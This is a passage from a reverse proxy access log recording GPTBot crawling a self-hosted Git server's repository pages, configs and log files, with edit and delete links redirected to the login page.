2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/fallback_stream_access.log" -[17/Feb/2026:16:22:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_stream_access.log" -[17/Feb/2026:16:22:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/fallback_stream_access.log" -[17/Feb/2026:16:22:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/fallback_http_error.log" -[17/Feb/2026:16:22:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/logs/fallback_http_error.log" -[17/Feb/2026:16:22:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 9845] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_stream_access.log" -[17/Feb/2026:16:22:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 2064] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" -[17/Feb/2026:16:23:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 14450] [Gzip 11.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" -[17/Feb/2026:16:23:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 14451] [Gzip 11.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" -[17/Feb/2026:16:23:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 2190] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_error.log" -[17/Feb/2026:16:23:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 1442] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_error.log" -[17/Feb/2026:16:23:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_stream_access.log" -[17/Feb/2026:16:23:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/fallback_http_access.log" -[17/Feb/2026:16:23:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/logs/fallback_http_access.log" -[17/Feb/2026:16:23:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 11116] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_error.log" -[17/Feb/2026:16:23:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 958] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_stream_access.log" -[17/Feb/2026:16:23:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%20PostgreSQL%20%EC%9E%91%EC%97%85.md" [Client 74.7.227.38] [Length 4444] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%20PostgreSQL%20%EC%9E%91%EC%97%85.md" -[17/Feb/2026:16:23:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?sort=leastcomplete&state=closed" [Client 74.7.227.38] [Length 8504] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?q=&sort=leastcomplete&state=open" -[17/Feb/2026:16:23:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?sort=mostcomplete&state=closed" [Client 74.7.227.38] [Length 8509] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?q=&sort=mostcomplete&state=open" -[17/Feb/2026:16:23:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?sort=leastcomplete&state=open" [Client 74.7.227.38] [Length 8499] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?q=&sort=leastcomplete&state=closed" -[17/Feb/2026:16:23:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?sort=leastissues&state=closed" [Client 74.7.227.38] [Length 8507] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?q=&sort=leastissues&state=open" -[17/Feb/2026:16:23:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/2.conf?display=source" [Client 74.7.227.38] [Length 12776] [Gzip 4.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/2.conf" -[17/Feb/2026:16:23:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/4.conf?display=source" [Client 74.7.227.38] [Length 12785] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/4.conf" -[17/Feb/2026:16:23:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/3.conf?display=source" [Client 74.7.227.38] [Length 13905] [Gzip 4.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/3.conf" -[17/Feb/2026:16:23:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/1.conf?display=source" [Client 74.7.227.38] [Length 12987] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/1.conf" -[17/Feb/2026:16:23:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/fallback_error.log" -[17/Feb/2026:16:23:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/logs/fallback_error.log" -[17/Feb/2026:16:23:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/fallback_error.log" -[17/Feb/2026:16:23:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/logs/fallback_error.log" -[17/Feb/2026:16:23:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_error.log?display=rendered" [Client 74.7.227.38] [Length 10942] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_error.log" -[17/Feb/2026:16:23:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_error.log?display=source" [Client 74.7.227.38] [Length 19583] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_error.log" -[17/Feb/2026:16:23:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-3_access.log?display=rendered" [Client 74.7.227.38] [Length 10974] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-3_access.log" -[17/Feb/2026:16:23:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_access.log?display=rendered" [Client 74.7.227.38] [Length 10947] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_access.log" -[17/Feb/2026:16:23:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_error.log?display=rendered" [Client 74.7.227.38] [Length 10941] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_error.log" -[17/Feb/2026:16:23:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-1_access.log?display=source" [Client 74.7.227.38] [Length 15946] [Gzip 6.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-1_access.log" -[17/Feb/2026:16:23:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-4_access.log?display=rendered" [Client 74.7.227.38] [Length 10974] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-4_access.log" -[17/Feb/2026:16:23:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_error.log?display=source" [Client 74.7.227.38] [Length 12831] [Gzip 3.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_error.log" -[17/Feb/2026:16:23:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-1_error.log?display=source" [Client 74.7.227.38] [Length 15274] [Gzip 6.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-1_error.log" -[17/Feb/2026:16:23:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_access.log?display=source" [Client 74.7.227.38] [Length 122534] [Gzip 13.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_access.log" -[17/Feb/2026:16:23:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_access.log?display=source" [Client 74.7.227.38] [Length 24965] [Gzip 10.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_access.log" -[17/Feb/2026:16:23:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_access.log?display=rendered" [Client 74.7.227.38] [Length 10974] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_access.log" -[17/Feb/2026:16:23:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-1_access.log?display=rendered" [Client 74.7.227.38] [Length 10973] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-1_access.log" -[17/Feb/2026:16:23:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_error.log?display=rendered" [Client 74.7.227.38] [Length 11001] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_error.log" -[17/Feb/2026:16:23:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_access.log?display=source" [Client 74.7.227.38] [Length 42643] [Gzip 12.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_access.log" -[17/Feb/2026:16:23:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-3_error.log?display=source" [Client 74.7.227.38] [Length 12342] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-3_error.log" -[17/Feb/2026:16:23:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_error.log?display=source" [Client 74.7.227.38] [Length 14420] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_error.log" -[17/Feb/2026:16:23:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-1_error.log?display=rendered" [Client 74.7.227.38] [Length 10971] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-1_error.log" -[17/Feb/2026:16:23:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_access.log?display=source" [Client 74.7.227.38] [Length 22685] [Gzip 10.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_access.log" -[17/Feb/2026:16:23:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-4_error.log?display=rendered" [Client 74.7.227.38] [Length 10972] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-4_error.log" -[17/Feb/2026:16:23:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-3_access.log?display=source" [Client 74.7.227.38] [Length 23879] [Gzip 9.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-3_access.log" -[17/Feb/2026:16:23:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-4_access.log?display=source" [Client 74.7.227.38] [Length 16357] [Gzip 6.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-4_access.log" -[17/Feb/2026:16:23:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_error.log?display=source" [Client 74.7.227.38] [Length 16192] [Gzip 7.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_error.log" -[17/Feb/2026:16:23:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_access.log?display=rendered" [Client 74.7.227.38] [Length 10948] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_access.log" -[17/Feb/2026:16:23:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-3_error.log?display=rendered" [Client 74.7.227.38] [Length 10972] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-3_error.log" -[17/Feb/2026:16:23:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_error.log?display=rendered" [Client 74.7.227.38] [Length 10941] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_error.log" -[17/Feb/2026:16:23:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-4_error.log?display=source" [Client 74.7.227.38] [Length 14763] [Gzip 